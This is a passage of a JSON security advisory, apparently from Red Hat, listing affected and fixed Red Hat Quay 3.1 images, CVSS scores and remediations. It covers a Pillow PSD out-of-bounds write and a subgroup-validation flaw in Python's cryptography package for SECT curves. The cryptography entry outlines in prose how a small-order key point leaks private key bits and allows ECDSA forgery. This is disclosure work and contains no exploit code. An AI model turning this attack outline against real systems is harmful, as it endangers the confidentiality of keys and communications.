"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25990"
},
{
"category": "external",
"summary": "RHBZ#2439170",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439170"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25990"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa",
"url": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc"
}
],
"release_date": "2026-02-11T20:53:52.524000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image"
},
{
"cve": "CVE-2026-26007",
"cwe": {
"id": "CWE-354",
"name": "Improper Validation of Integrity Check Value"
},
"discovery_date": "2026-02-10T22:01:01.036116+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438762"
}
],
"notes": [
{
"category": "description",
"text": "A validation flaw has been discovered in the python cryptography package. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor \u003e 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it\u0027s easy to forge signatures on the small subgroup. Only SECT curves are impacted by this.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "cryptography: cryptography Subgroup Attack Due to Missing Subgroup Validation for SECT Curves",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw, while difficult to exploit, would lead to a loss of integrity in the encrypted communication channel. Given that the cryptography package is a library, it is likely to be used in situations that do not require user interaction.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26007"
},
{
"category": "external",
"summary": "RHBZ#2438762",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438762"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26007",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26007"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26007",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26007"
},
{
"category": "external",
"summary": "https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c",
"url": "https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c"
},
{
"category": "external",
"summary": "https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2",
"url": "https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2"
}
],
"release_date": "2026-02-10T21:42:56.471000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
